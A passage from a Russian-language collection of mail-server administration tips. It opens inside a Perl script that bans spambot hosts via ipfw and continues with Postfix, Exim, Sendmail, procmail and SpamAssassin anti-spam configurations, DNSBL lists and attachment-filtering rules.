$conns->{$locip} ||= {}; $conns->{$locip}->{$remip} ||= 1; } alarm(0); sleep(1); # # Analyze connections # $mask = POSIX::SigSet->new( SIGALRM ); $action = POSIX::SigAction->new( sub { die("Reverse lookup took too long"); }, $mask ); $oldaction = POSIX::SigAction->new(); sigaction(14, $action, $oldaction); alarm(60); # Reverse DNS lookups must complete within this period my %concount; my %bots; for my $locip (keys(%$conns)){ #print("Loc IP: $locip\n"); my $cnt = 0; for my $remip (keys(%{$conns->{$locip}})){ #print(" Rem IP: $remip\n"); $cnt++; } $concount{$locip} = $cnt; } for my $locip (sort {$concount{$b} <=> $concount{$a}} keys(%concount)){ if($concount{$locip} > $norev_limit){ my $ip = inet_aton($locip); my $name = gethostbyaddr($ip, AF_INET); if($concount{$locip} > ($name ? $rev_limit : $norev_limit)){ #print("$locip: $concount{$locip} (" . ($name || '') . ")\n"); $bots{$locip} = $name; } } } alarm(0); # # Update database # $mask = POSIX::SigSet->new( SIGALRM ); $action = POSIX::SigAction->new( sub { die("Database timeout"); }, $mask ); $oldaction = POSIX::SigAction->new(); sigaction(14, $action, $oldaction); alarm(15); my $dbh = DBI->connect("dbi:Pg:host=db.host.tld;dbname=spambot", "spambot", "passwd"); if(!$dbh) { die("Cannot connect to DB"); } my $query; my $sth; my $rv; for my $botip (keys(%bots)){ #print "$botip\n"; my $qname = $dbh->quote($bots{$botip}); $query = " update spambot_hosts set active_till = now() + '1 days', hostname = $qname where ip = '$botip' "; $sth = $dbh->prepare($query); $rv = $sth->execute(); if($rv != 1){ $query = " insert into spambot_hosts (ip, hostname, active_till) values ('$botip', $qname, now() + '1 days') "; $sth = $dbh->prepare($query); $sth->execute(); } } $query = " delete from spambot_hosts where active_till < now() "; $sth = $dbh->prepare($query); $sth->execute(); # # Get full list of banned hosts from DB # $query = " select ip from spambot_hosts "; $sth = $dbh->prepare($query); $sth->execute(); my %dlist; while(my $row = $sth->fetchrow_hashref){ $dlist{$row->{ip}} = 1; } undef $dbh; alarm(0); # # Read list of banned hosts from kernel (ipfw) table # my %klist; if(open(KTABLE, "/sbin/ipfw table $table_no list|")){ while(<KTABLE>){ chomp(); s/\/32//; my ($prefix, $queue) = split(); $klist{$prefix} = 1; } close(KTABLE); } # # Update kernel table # for my $host (keys(%dlist)){ unless($klist{$host}){ #print "Add $host\n"; system("/sbin/ipfw table $table_no add $host"); } } for my $host (keys(%klist)){ unless($dlist{$host}){ #print "Remove $host\n"; system("/sbin/ipfw table $table_no delete $host"); } } exit; Из /etc/ipfw.rules: #.... ipfw -q add deny tcp from "table(1)" to any 25 #.... У нас скрипт работает на шейпере, обслуживающем только заграничный канал. Местный трафик им не анализируется и не блокируется. При этом большая часть "хорошей" почты ходит именно по местным каналам, но спамеры спамят в основном по заграничному каналу. Так что лимиты вам наверняка придется подстроить под себя. Возможно, вам придется также реализовать "белый список", если у вас есть очень активные SMTP-сервера. На момент написания статьи в "расстрельном списке" несколько десятков хостов. Жалоб за истекшие сутки не поступало, хотя раньше их было множество.

Ведение полного лога почтовых отправлений, произведенных через PHP скрипты [обсудить]

В PHP 5.3 добавлена поддержка ведения полного лога всех почтовых отправлений через функцию mail(). Указав в ini-файле опцию "mail.log имя_файла", в заданным файл будут сохранены данные от какого пользователя, из какого скрипта, и из какой строки этого скрипта была инициирована отправка каждого письма. При указании опции "mail.add-x-header true" в отправляемые через PHP функцию mail() письма будет добавлен заголовок X-PHP-Originating-Script с информацией об скрипте и отправителе.

Обучение SpamAssassin при помощи Gmail (доп. ссылка 1) Автор: Yuri Trofimov [комментарии]

Суть идеи в использовании антиспам фильтров Google для обучения SpamAssassin на локальном почтовом сервере. Сначала заходим в свой ящик на Gmail, включаем IMAP и устанавливаем английский язык интерфейса. Делаем для root вот такой ~/.fetchmailrc poll imap.gmail.com protocol imap port 993 and options no dns, user "user@gmail.com" options ssl, password "pass", fetchall, pass8bits, nokeep, folder "[Gmail]/Spam”, mda “/usr/bin/sa-learn -spam -single” Запускаем fetchmail -f .fetchmailrc -v Делаем бэкап БД spamassassin: sa-learn --backup > sa-learn.backup.db

Сборка exim с поддержкой SPF и DomainKeys в Debian GNU/Linux (доп. ссылка 1) Автор: Pavel Piatruk [комментарии]

echo 'deb-src ftp://ftp.nl.debian.org/debian/ testing main contrib non-free' >> /etc/apt/sources.list apt-get update apt-get build-dep exim4 apt-get install libspf2-dev libspf2-2 cd wget http://www.kibibyte.se/download/debian/libdomainkeys0_0.68-1_i386.deb wget http://www.kibibyte.se/download/debian/libdomainkeys0-dev_0.68-1_i386.deb dpkg -i libdomainkeys0_0.68-1_i386.deb dpkg -i libdomainkeys0-dev_0.68-1_i386.deb cd /usr/src apt-get source exim4 cd exim4-4.68 fakeroot debian/rules unpack-configs cp EDITME.exim4-heavy EDITME.exim4-custom vi EDITME.exim4-custom # uncomment next lines: EXPERIMENTAL_SPF=yes LDFLAGS += -lspf2 # add next lines EXPERIMENTAL_DOMAINKEYS=yes LDFLAGS += -ldomainkeys fakeroot debian/rules pack-configs fakeroot debian/rules extradaemonpackages=exim4-daemon-custom binary ls ../*deb #TEST: cd .. dpkg -X exim4-daemon-custom_4.68-2_i386.deb EXIM ldd EXIM/usr/sbin/exim4 | grep -e domainkeys -e spf #libspf2.so.2 => /usr/lib/libspf2.so.2 (0xb7752000) #libdomainkeys.so.0 => /usr/lib/libdomainkeys.so.0 (0xb774c000)

Блокировка отброшенных SMTP сервером IP адресов/подсетей. Автор: Забудкин Лев Мирославович [комментарии]

#!/bin/sh # #REJECTSPAMMERS v0.1b Lev Zabudkin. zabudkin@mail.ru # #Описание: # Данный скрипт аккумулирует (создаёт/пополняет) уникальный список IP адресов, # которые были отброшены SMTP сервером. # Скрипт создан с той целью, чтобы REJECT'ить в дальнейшем все пакеты с таких адресов. # #Действие: # После выполнения будут созданы файлы в папке указанной в SCRIPTDIR (см. ниже): # rejectspammers.run.iptables.block.byip.add - Блокировать IP адреса # rejectspammers.run.iptables.block.byip.delete - Убрать прежнюю блокировку IP адресов # rejectspammers.run.iptables.block.byip.subnet24.add - Блокировать всю подсеть 255.255.255.0 IP адресов # rejectspammers.run.iptables.block.byip.subnet24.delete - Убрать прежнюю блокировку подсети 255.255.0.0 # rejectspammers.run.iptables.block.byip.subnet16.add - Блокировать всю подсеть 255.255.0.0 IP адресов # rejectspammers.run.iptables.block.byip.subnet16.delete - Убрать прежнюю блокировку подсети 255.0.0.0 # rejectspammers.run.iptables.block.byip.subnet8.add - Блокировать всю подсеть 255.0.0.0 IP адресов # rejectspammers.run.iptables.block.byip.subnet8.delete - Убрать прежнюю блокировку подсети 255.0.0.0 # # Соответственно для нужной блокировки запустите нужный файл. # #Создавать ли файлы с цепочками DELETE MAKEDELETEOLD=yes #Файл с логами SMTP сервера MAILLOG=/var/log/maillog #Каталог, в котором создавать скрипты iptables SCRIPTDIR=/ #Временный каталог TEMPDIR=/tmp cat $MAILLOG | grep rejected >$TEMPDIR/rejectedspammers awk '{user[tolower($10)]=$10} END {for(i in user) {print i}}' $TEMPDIR/rejectedspammers >$TEMPDIR/rejectedspammers.list cat $TEMPDIR/rejectedspammers.list |cut -d '[' -f2|cut -d ']' -f1 | uniq >$TEMPDIR/rejectspammers.ips awk --field-separator=. '{print "iptables -A INPUT -s "$1"."$2"."$3"."$4" -p tcp --dport 25 -j REJECT";}' \ $TEMPDIR/rejectspammers.ips>>$SCRIPTDIR/rejectspammers.run.iptables.block.byip.add awk --field-separator=. '{print "iptables -A INPUT -s "$1"."$2"."$3".".0/24" -p tcp --dport 25 -j REJECT";}' \ $TEMPDIR/rejectspammers.ips>>$SCRIPTDIR/rejectspammers.run.iptables.block.bysubnet24.add awk --field-separator=. '{print "iptables -A INPUT -s "$1"."$2".".0/16" -p tcp --dport 25 -j REJECT";}' \ $TEMPDIR/rejectspammers.ips>>$SCRIPTDIR/rejectspammers.run.iptables.block.bysubnet16.add awk --field-separator=. '{print "iptables -A INPUT -s "$1".".0/8" -p tcp --dport 25 -j REJECT";}' \ $TEMPDIR/rejectspammers.ips>>$SCRIPTDIR/rejectspammers.run.iptables.block.bysubnet8.add cat $SCRIPTDIR/rejectspammers.run.iptables.block.byip.add | sort | uniq \ >$TEMPDIR/rejectspammers.run.iptables.block.byip.add.temp cat $TEMPDIR/rejectspammers.run.iptables.block.byip.add.temp >$SCRIPTDIR/rejectspammers.run.iptables.block.byip.add cat $SCRIPTDIR/rejectspammers.run.iptables.block.bysubnet24.add | sort | uniq \ >$TEMPDIR/rejectspammers.run.iptables.block.bysubnet24.add.temp cat $TEMPDIR/rejectspammers.run.iptables.block.bysubnet24.add.temp >$SCRIPTDIR/rejectspammers.run.iptables.block.bysubnet24.add cat $SCRIPTDIR/rejectspammers.run.iptables.block.bysubnet16.add | sort | uniq \ >$TEMPDIR/rejectspammers.run.iptables.block.bysubnet16.add.temp cat $TEMPDIR/rejectspammers.run.iptables.block.bysubnet16.add.temp >$SCRIPTDIR/rejectspammers.run.iptables.block.bysubnet16.add cat $SCRIPTDIR/rejectspammers.run.iptables.block.bysubnet8.add | sort | uniq \ >$TEMPDIR/rejectspammers.run.iptables.block.bysubnet8.add.temp cat $TEMPDIR/rejectspammers.run.iptables.block.bysubnet8.add.temp >$SCRIPTDIR/rejectspammers.run.iptables.block.bysubnet8.add if [ "$MAKEDELETEOLD" == "yes" ]; then awk --field-separator=. '{print "iptables -D INPUT -s "$1"."$2"."$3"."$4" -p tcp --dport 25 -j REJECT";}' \ $TEMPDIR/rejectspammers.ips>>$SCRIPTDIR/rejectspammers.run.iptables.block.byip.delete awk --field-separator=. '{print "iptables -D INPUT -s "$1"."$2"."$3".".0/24" -p tcp --dport 25 -j REJECT";}' \ $TEMPDIR/rejectspammers.ips>>$SCRIPTDIR/rejectspammers.run.iptables.block.bysubnet24.delete awk --field-separator=. '{print "iptables -D INPUT -s "$1"."$2".".0/16" -p tcp --dport 25 -j REJECT";}' \ $TEMPDIR/rejectspammers.ips>>$SCRIPTDIR/rejectspammers.run.iptables.block.bysubnet16.delete awk --field-separator=. '{print "iptables -D INPUT -s "$1".".0/8" -p tcp --dport 25 -j REJECT";}' \ $TEMPDIR/rejectspammers.ips>>$SCRIPTDIR/rejectspammers.run.iptables.block.bysubnet8.delete cat $SCRIPTDIR/rejectspammers.run.iptables.block.byip.delete | sort | uniq \ >$TEMPDIR/rejectspammers.run.iptables.block.byip.delete.temp cat $TEMPDIR/rejectspammers.run.iptables.block.byip.delete.temp >$SCRIPTDIR/rejectspammers.run.iptables.block.byip.delete cat $SCRIPTDIR/rejectspammers.run.iptables.block.bysubnet24.delete | sort | uniq \ >$TEMPDIR/rejectspammers.run.iptables.block.bysubnet24.delete.temp cat $TEMPDIR/rejectspammers.run.iptables.block.bysubnet24.delete.temp >$SCRIPTDIR/rejectspammers.run.iptables.block.bysubnet24.delete cat $SCRIPTDIR/rejectspammers.run.iptables.block.bysubnet16.delete | sort | uniq \ >$TEMPDIR/rejectspammers.run.iptables.block.bysubnet16.delete.temp cat $TEMPDIR/rejectspammers.run.iptables.block.bysubnet16.delete.temp >$SCRIPTDIR/rejectspammers.run.iptables.block.bysubnet16.delete cat $SCRIPTDIR/rejectspammers.run.iptables.block.bysubnet8.delete | sort | uniq \ >$TEMPDIR/rejectspammers.run.iptables.block.bysubnet8.delete.temp cat $TEMPDIR/rejectspammers.run.iptables.block.bysubnet8.delete.temp >$SCRIPTDIR/rejectspammers.run.iptables.block.bysubnet8.delete fi chmod +0755 $SCRIPTDIR/rejectspammers.run.iptables.block.*

Особенность использования Dspam в связке с qmail+vpopmail Автор: Олег [комментарии]

Следует отметить, что если вы используете dspam в связке с qmail+vpopmail последний должен быть версии не ниже 5.3.7 (с опцией --enable-make-seekable, она yes по умолчанию), иначе не работает конструкция вида: /usr/local/dspam/bin/dspam --user local_part@domain.com \ --deliver=innocent,spam | /var/vpopmail/bin/vdelivermail '' bounce-no-mailbox vdelivermail отваливается с ошибкой на несикабельность пайпа (errno 29).

Фильтрация спама силами Postfix. Автор: Дмитрий Кустов [комментарии]

Привожу выдержки из настроек в main.cf для фильтрации спама в версии Postfix 2.2 его собственными силами. Использую также SASL2 для аутентификации (это не обязательно) и PCRE (аналог regexp). /etc/postfix/main.cf ==================== disable_vrfy_command = yes strict_rfc821_envelopes = yes smtpd_etrn_restriction = reject smtpd_sasl_auth_enable = yes smtpd_helo_required = yes smtpd_helo_restrictions = smtpd_recipient_restrictions = permit_sasl_authenticated, permit_mynetworks, reject_non_fqdn_recipient, check_recipient_access pcre:/etc/postfix/recipient_checks.pcre, reject_unknown_recipient_domain, reject_unverified_recipient, reject_unauth_destination, reject_unauth_pipelining, permit_auth_destination smtpd_data_restrictions = reject_unauth_pipelining, reject_multi_recipient_bounce, permit smtpd_delay_reject=no # здесь у меня пусто, но можно ввести свой контроль smtpd_client_restrictions = # check_client_access hash:/etc/postfix/maps/access_client # количество RBL серверов регулируйте сами, я дал наиболее распространённые, на мой взгляд smtpd_sender_restrictions = permit_sasl_authenticated, permit_mynetworks, reject_invalid_hostname, reject_non_fqdn_hostname, reject_non_fqdn_sender, check_sender_access hash:/etc/postfix/maps/ not_our_domain_as_sender, reject_unknown_client, reject_unknown_sender_domain, reject_unknown_hostname, check_client_access pcre:/etc/postfix/client_checks.pcre, check_helo_access pcre:/etc/postfix/helo_checks.pcre, reject_rbl_client bl.spamcop.net, reject_rbl_client sbl-xbl.spamhaus.org, reject_rbl_client dul.dnsbl.sorbs.net, reject_rbl_client list.dsbl.org, reject_rbl_client dnsbl.njabl.org, reject_rbl_client relays.ordb.org, reject_rbl_client cbl.abuseat.org, reject_rbl_client opm.blitzed.org, reject_rbl_client dul.ru, reject_rhsbl_sender dsn.rfc-ignorant.org ==================== /etc/postfix/client_checks.pcre ==================== /(modem|dia(l|lup)|cp[ce]|dsl|p[cp]p|cable|catv|poo(l|les)|pppoe|dhcp|client| customer|user|host|[0-9]{4,})(-|_|\.|[0-9])/ REJECT Invalid hostname (client) /[0-9]+-[0-9]+/ REJECT Invalid hostname (D-D) ==================== /etc/postfix/helo_checks.pcre ==================== /[^[] *[0-9]+((\.|-|_)[0-9]+){3}/ REJECT Invalid hostname (ipable) /(modem|dia(l|lup)|cp[ce]|dsl|p[cp]p|cable|catv|poo(l|les)|pppoe|dhcp|client| customer|user|host|[0-9]{4,})(-|_|\.|[0-9])/ REJECT Invalid hostname (client) /[0-9]+-[0-9]+/ REJECT Invalid hostname (D-D) ==================== /etc/postfix/recipient_checks.pcre ==================== /[@!%].*[@!%]/ 550 Please use user@domain address forms only. ==================== /etc/postfix/maps/not_our_domain_as_sender ==================== yourdomain.tld 554 Go away, bloody spammer! ====================

Kaspersky + Postfix с ограничениями для адресов Автор: BrUYE [обсудить]

При автоматической установке Касперского для Postfix при настроенных ограничениях для адресов (smtpd_recipient_restrictions, sender_restrictions, etc) в логи валятся сообщения типа: postfix/smtpd[20375]: connect from localhost.localdomain[127.0.0.1] postfix/smtpd[20375]: warning: unknown smtpd restriction: "restricted_recipients" postfix/smtpd[20375]: NOQUEUE: reject: RCPT from localhost.localdomain[127.0.0.1]: 451 Server configuration error; from=<user@domain.com> to=<group@domain.com> postfix/lmtp[20197]: 00499FCF34: to=<group@domain.com>, relay=127.0.0.1[127.0.0.1], delay=10, status=deferred (host 127.0.0.1[127.0.0.1] said: 421 <group@domain.com> Error ! (in reply to end of DATA command)) Необходимо убрать/закомментировать в /etc/postfix/master.cf параметры, которые прописал KAV и которые конфликтуют с параметрами в /etc/postfix/main.cf. У меня секция KAV в /etc/postfix/master.cf имеет вид: 127.0.0.1:10030 inet n n n - 20 spawn user=kluser argv=/opt/kav/5.5/kav4mailservers/bin/smtpscanner 127.0.0.1:10031 inet n - n - 21 smtpd -o content_filter= # -o local_recipient_maps= # -o relay_recipient_maps= # -o smtpd_restriction_classes= # -o smtpd_client_restrictions= # -o smtpd_helo_restrictions= # -o smtpd_sender_restrictions= # -o mynetworks=127.0.0.0/8 -o strict_rfc821_envelopes=yes -o smtpd_error_sleep_time=0 -o smtpd_soft_error_limit=1001 -o smtpd_hard_error_limit=1000 -o myhostname=mail.domain.com Потом mail# postfix reload; postqueue -f

Какие эффективные DNSBL списки дают наименьшее число ложных срабатываний. [комментарии]

Советую использовать list.dsbl.org (http://dsbl.org/) и dnsbl.njabl.org (http://dnsbl.njabl.org/).

Блокирование спама в postfix используя маски для домена в HELO Автор: Евгений Егоров [комментарии]

Открыл недавно несколько возможностей в Постфиксе для отсеивания нежелательной почты на этапе HELO. Теперь у меня сервер отсеивает от 90 до 98% почты сразу. Антивирус (clamAV) и SA отдыхают. Коэффициент SA задрал до 7.3. Все равно до него мало что доходит. Итак в main.cf стоит: smtpd_recipient_restrictions = permit_mynetworks, reject_non_fqdn_recipient, reject_unauth_destination, check_helo_access hash:/etc/postfix/helo_checks, check_helo_access pcre:/etc/postfix/helo_checks_pcre, check_sender_access hash:/etc/postfix/sender_checks, check_client_access hash:/etc/postfix/client_checks, check_sender_mx_access cidr:/etc/postfix/mx_access, check_recipient_mx_access cidr:/etc/postfix/mx_access, reject_rbl_client relays.ordb.org, reject_rbl_client sbl.spamhaus.org, reject_unknown_sender_domain, reject_unknown_recipient_domain /etc/postfix/helo_checks: # Reject anybody that HELO's as being in our own domain(s) # (Note that if you followed the order suggested in the main.cf # examples, above, that machines in mynetworks will be okay.) <Мой домен> REJECT You are not in trala.la # Somebody HELO'ing with our IP address? <мой IP> REJECT You are not me Это хорошо помогает против вирус и зомби. /etc/postfix/helo_checks.pcre: # Initial expression #/^[0-9]+(\.[0-9]+){3}$/ REJECT Invalid hostname (plain D) # expression modified by Eugene 22.03.2005 /[^[] *[0-9]+((\.|-)[0-9]+){3}/ REJECT Invalid hostname (ipable) # /(modem|dia(l|lup)|dsl|p[cp]p|cable|catv|poo(l|les)|dhcp|client|customer|user|[0 -9]{4,})(-|\.|[0-9])/ REJECT Invalid hostname (client) # /[0-9]+-[0-9]+/ REJECT Invalid hostname (D-D)

Postfix и фильтр запрещенных атачей с уведомлением (доп. ссылка 1) Автор: JackSoft [комментарии]

Пример конфигурации для Postfix 2.1.x, позволяющей ограничить доступ писем с определенными атачами, с генерацией отчета о недоставке отправителю, c указанием причины блокировки. main.cf: mydomain = test.ru myorigin = $mydomain soft_bounce = no bounce_size_limit = 50000 relayhost = mail.test.ru queue_directory = /var/spool/postfix command_directory = /usr/local/sbin daemon_directory = /usr/local/libexec/postfix mail_owner = fcmail default_privs = nobody mynetworks_style = subnet mynetworks = 192.168.0.0/16 alias_maps = hash:/etc/mail/aliases alias_database = hash:/etc/mail/aliases mail_spool_directory = /var/mail smtp_always_send_ehlo = yes transport_maps = hash:/usr/local/etc/postfix/transport smtpd_helo_required = yes message_size_limit = 5242880 readme_directory = no sample_directory = /usr/local/etc/postfix sendmail_path = /usr/local/sbin/sendmail setgid_group = maildrop manpage_directory = /usr/local/man newaliases_path = /usr/local/bin/newaliases mailq_path = /usr/local/bin/mailq local_recipient_maps = $alias_maps unix:passwd.byname notify_classes = delay, protocol, resource, software, policy header_checks=regexp:/usr/local/etc/postfix/header_checks header_checks=pcre:/usr/local/etc/postfix/header_checks mime_header_checks=regexp:/usr/local/etc/postfix/mime_checks mime_header_checks=pcre:/usr/local/etc/postfix/mime_checks default_process_limit=500 smtpd_sender_restrictions = check_sender_access hash:/usr/local/etc/postfix/smtpd.sender, permit relocated_maps=hash:/usr/local/etc/postfix/relocated maximal_queue_lifetime = 1h delay_warning_time = 1h bounce_notice_recipient = it 2bounce_notice_recipient = it error_notice_recipient = it smtp_skip_4xx_greeting = yes smtp_skip_5xx_greeting = no access_map_reject_code = 550 reject_code = 550 unknown_client_reject_code = 550 Правила фильтрации в файле mime_checks: /^\s*Content-(Disposition|Type).*name\s*=\s*"?(.+\.(lnk|asd|hlp|ocx|reg\ |bat|c[ho]m|cmd|exe|dll|vxd|pif|scr|hta|jse?|sh[mbs]|vb[esx]|ws[fh]\ |wav|mov|wmf|xl|jpg|bmp|gif|mp3))"?\s*$/ \ REJECT 550 Attachment type not allowed. File "$2" has unacceptable extension "$3" Для дублирования уведомлений на служебный адрес, нужно указать: bounce_notice_recipient = it 2bounce_notice_recipient = it error_notice_recipient = it где it - Ваше е-mail или группа рассылки.

Проверка фильтров postfix (доп. ссылка 1) Автор: Roman Y. Bogdanov [обсудить]

Как проверить фильтры для postfix? Очень просто: $ postmap -q "Content-Type: 1.exe" regexp:/etc/postfix/header_checks Или просто входом с файла $ postmap -q - regexp:/etc/postfix/body_checks < msg_file Замечание: postmap не делает различий между header, subject и bodymessage.

Запрещение внешней почты с указанием собственным домена в качестве отправителя. (доп. ссылка 1) Автор: Roman Y. Bogdanov [комментарии]

Когда спам идет от адреса домена пользователю домена. helo somehost mail from: me@mydomain.ru rcpt to: me@mydomain.ru data Т.е. когда почта принимается с любого IP адреса для $mydestination на MX. А с внешнего адреса она к нам приходить не может. Это не есть правильно. Лечить в Postfix так (main.conf): smtpd_recipient_restrictions = permit_mynetworks, check_sender_access hash:/usr/local/etc/postfix/antispam/wtf, ограничения дальше, ... потом, в antispam/wtf brj.pp.ru 554 brj.pp.ru sender? What the fuck? You're not in mynetworks! потом makemap hash /usr/local/etc/postfix/antispam/wtf.db < /usr/local/etc/postfix/antispam/wtf

Ограничения для адреса отправителя в Postfix Автор: Косенков Игорь [комментарии]

Иногда требуется ограничить прием почты для Postfix только с определенных доменов. Пример - внутренний почтовый сервер для приема и отправки почты только в локальной сети. В этом случае нам нужно , чтобы почта ходила только внутри некоего домена - mydomain.ru. Делаем следующее. В main.cf: smtpd_sender_restrictions = check_sender_access hash:/etc/postfix/access, reject В файле access: #здесь перечисляем домен(ы) для которых почта разрешена почта mydomain.ru OK Затем postmap access postfix reload Теперь будет приниматься почта только для тех, у кого в поле MAIL FROM стоит mydomain.ru. Для всех остальных - генериться код "Acces denied".

Проверка наличия пользователя на этапе соединения в Postfix (2 способ) Автор: Косенков Игорь [комментарии]

2 способ позволяет среди всех пользователей в системе отобрать тех, которым ДЕЙСТВИТЕЛЬНО нужна почта. В main.cf: local_recipient_maps = hash:/etc/postfix/users Сюда же можно добавить $alias_maps. В /etc/postfix/users заносим всех пользователей, для которых надо принимать почту: user1 здесь_что-нибудь user2 здесь_что-нибудь "здесь_что-нибудь" - это набор все равно каких символов, чтобы выполнилась команда postmap. Затем postmap /etc/postfix/users. И, конечно, postfix reload. Теперь почта будет приниматься только для пользователей из файла users. Для остальных будет генериться "User unknown in local recipient table" на этапе соединения.

Подключение RBL и списков блокировки в Postfix 2 Автор: awk [комментарии]

smtpd_client_restrictions = ... reject_rbl_client list.dsbl.org check_recipient_access hash:/etc/postfix/skipcheck, reject_unknown_client Предпоследняя строка позволяет разрешить получение почты для некоторых получателей с unknown адресов. только для этого необходимо указать в конфиге smtpd_delay_reject=yes тогда даже на этапе HELO можно указывать исключения на основе адреса получателя: smtpd_helo_restrictions = permit_mynetworks, reject_invalid_hostname, reject_non_fqdn_hostname, check_recipient_access hash:/etc/postfix/skipcheck, reject_unknown_hostname

Фильтры в Postfix для копирования исходящей почты (доп. ссылка 1) Автор: Косенков Игорь [комментарии]

1. В master.cf добавить строку: backup unix - n n - - pipe flags=R user=postfix argv=/etc/postfix/script ${sender} ${recipient} 2. В /etc/postfix/script должно быть: #!/bin/bash /usr/sbin/sendmail -f $1 $2 backup@mydomain.ru 3.Добавить в main.cf: smtpd_sender_restrictions = что там есть, hash:/etc/postfix/smtpd.sender 4. Создать файлик /etc/postfix/smtpd.sender такого вида (потом сделать postmap smtpd.sender): user@mydomain.ru FILTER backup:

Простые и эффективные regex для блокирования спама по имени домена [комментарии]

/^dsl.*\..*\..*/i 553 AUTO_DSL spam /[ax]dsl.*\..*\..*/i 553 AUTO_XDSL spam /client.*\..*\..*/i 553 AUTO_CLIENT spam /cable.*\..*\..*/i 553 AUTO_CABLE spam /pool.*\..*\..*/i 553 AUTO_POOL spam /dial.*\..*\..*/i 553 AUTO_DIAL spam /ppp.*\..*\..*/i 553 AUTO_PPP spam /dslam.*\..*\..*/i 553 AUTO_DSLAM spam /node.*\..*\..*/i 553 AUTO_NODE spam Подключение для Postfix: в main.cf, к smtpd_client_restrictions списку добавить regexp:путь

Как в Exim отфильтровать спам по базе открытых релеев. Автор: dawnshade [обсудить]

После строки "require verify = sender" deny message = Access denied - $sender_host_address listed by $dnslist_domain\n$dnslist_text dnslists = dnsbl.sorbs.net deny message = message from $sender_host_address rejected - see http://njabl.org/ dnslists = dnsbl.njabl.org deny message = rejected because $sender_host_address for bad WHOIS info, see http://www.rfc-ignorant.org/ dnslists = ipwhois.rfc-ignorant.org deny message = rejected because $sender_host_address is in a black list at $dnslist_domain\n$dnslist_text dnslists = dialups.mail-abuse.org deny message = rejected because $sender_host_address is in a black list at $dnslist_domain\n$dnslist_text dnslists = list.dsbl.org deny message = Spam blocked see: http://www.spamcop.net/w3m?action=checkblock&ip=$sender_host_address dnslists = bl.spamcop.net deny message = rejected because $sender_host_address is in a black list at $dnslist_domain\n$dnslist_text dnslists = relays.ordb.org deny message = rejected, $sender_host_address Open Proxy, see: $dnslist_domain\n$dnslist_text dnslists = dnsbl.void.ru

Как отфильтровать в postfix ALC спам Автор: Antony [комментарии]

Postfix: body_checks = regexp:/etc/postfix/body_checks Пример для "AMER ICAN LA NGUAGE CENTER" /etc/postfix/body_checks: ~^[[:alnum:]+/]{60,}[[:space:]]*$~ OK /.*A.*M.*E.*R.*I.*C.*A.*N.*L.*A.*N.*G.*U.*A.*G.*E.*C.*E.*N.*T.*E.*R.*/ REJECT Body Spam Rule NN

Как отфильтровать спам по базе открытых релеев. [комментарии]

Postfix: maps_rbl_domains = work.drbl.caravan.ru, dul.ru, relays.ordb.org maps_rbl_reject_code = 550 smtpd_client_restrictions = reject_maps_rbl Sendmail (в sendmail.mc): FEATURE('dnsbl', 'dul.ru', 'Use mail relays of your ISP')dnl FEATURE('dnsbl', 'work.drbl.caravan.ru', `Use mail relays of your ISP')dnl FEATURE('dnsbl', 'relays.ordb.org', 'Spam bloked from open relay.')dnl Ссылки: http://www.drbl.ofisp.org/zones.html , http://www.dul.ru/ , http://ordb.org/faq/

Где взять примеры написания фильтров к MTA для блокирования вирусов. [комментарии]

Exim: ftp://ftp.exim.org/pub/filter/ Подключается через: message_filter = /etc/exim/system_filter.exim Procmail: ftp://ftp.rubyriver.com/pub/jhardin/antispam/html-trap.procmail Postfix: http://www.mrbill.net/postfix/ https://www.opennet.ru/base/net/postfix_filter.txt.html

Как через procmail блокировать спам. [обсудить]

Вот пример моего .procmailrc, фильтует наиболее примитивные попытки спэма: :0 * ^To: undisclosed-recipients /home/mc/Mail/Trash :0 * !^To: .*@ /home/mc/Mail/Trash :0 * ^X-Mailer:.*Advanced Mass /home/mc/Mail/Trash :0 * ^Content-Type.*indows-1251 /home/mc/Mail/Trash :0 * ^Content-Disposition: attachment; filename=.*\.(pif|bat|com|exe|lnk) /home/mc/Mail/Trash

Как вырезать вирусы из письма используя Postfix [обсудить]

/etc/postfix/main.cf: body_checks = regexp:/etc/postfix/body_checks header_checks = regexp:/etc/postfix/header_checks /etc/postfix/body_checks: # Вырезаем EXE файлы. # в скобках [ ] - один пробел и один символ табуляции. /^[ ]*name=.*\.(exe|dll|eml|vbs|pif|com|bat|scr|lnk)\"?$/ REJECT /\<iframe src=cid\:.* height=0 width=0\>/i REJECT /^Content-Disposition: attachment; *filename=.*\.(exe|dll|eml|vbs|pif|com|bat|scr|lnk).*/i REJECT /etc/postfix/header_checks: # Sircam /^Content-Type:multipart.*"----[A-F0-9]+_Outlook_Express_message_boundary"/i # Nimbda /^X-Unsent: 1/ REJECT /^X-Mailer: Advanced Mass Sender/ REJECT /^X-Mailer: Mail Bomber/ REJECT /^X-Mailer: .*\-VC_IPA \[/ REJECT

Отправка и пересылка сообщений на уровне пользователя

Настройка maildrop для автоматической подписки на багрепорты на bugs.debian.org Автор: Alexander Galanin [обсудить]

К сожалению, на bugs.debian.org функция автоматической подписки на отправленные багрепорты не реализована. Также процесс подписки требует отправки письма и подтверждения, поэтому возникло желание это дело автоматизоровать. С использованием maildrop у меня получилось нижеприведённое. В случае, если письмо ни под одно из правил не подходит, оно будет помещено в maildir-каталог "bugs", информация о проведённых действиях добавляется в лог maildrop-а. Подписываемся на отправленный багрепорт: if (/^To: .*<submit@bugs.debian.org>/ && /^Subject: Bug#[0-9]+/) { /^X-Debian-PR-Message: report ([0-9]+)/ bug = $MATCH1 if ($bug ne "") { # subscription mail = $bug-subscribe@bugs.debian.org cc "| echo | mailx $mail" log "Debbugs: Subscribed to $bug" } to $DEFAULT/.bugs } Подтверждение подписки и игнорирование письма об удачном завершении подписки: if (/^From: ([0-9]+)-subhelp@bugs.debian.org$/) { bug = $MATCH1 if (/^Subject: Please confirm subscription/) { /^Reply-To: .*/ mail = getaddr($MATCH) if ($mail ne "") { cc "| echo | mailx $mail" log "Debbugs: Confirmed subscription to $bug" to /dev/null } } if (/^Subject: Subscription to [0-9]+@bugs.debian.org successful/) { log "Debbugs: Subscription to $bug successful" to /dev/null } # fallback rule to $DEFAULT/.bugs }

Настройка msmtp для отправки уведомлений администратору по E-Mail (доп. ссылка 1) (доп. ссылка 2) Автор: Netc & PavelR [комментарии]

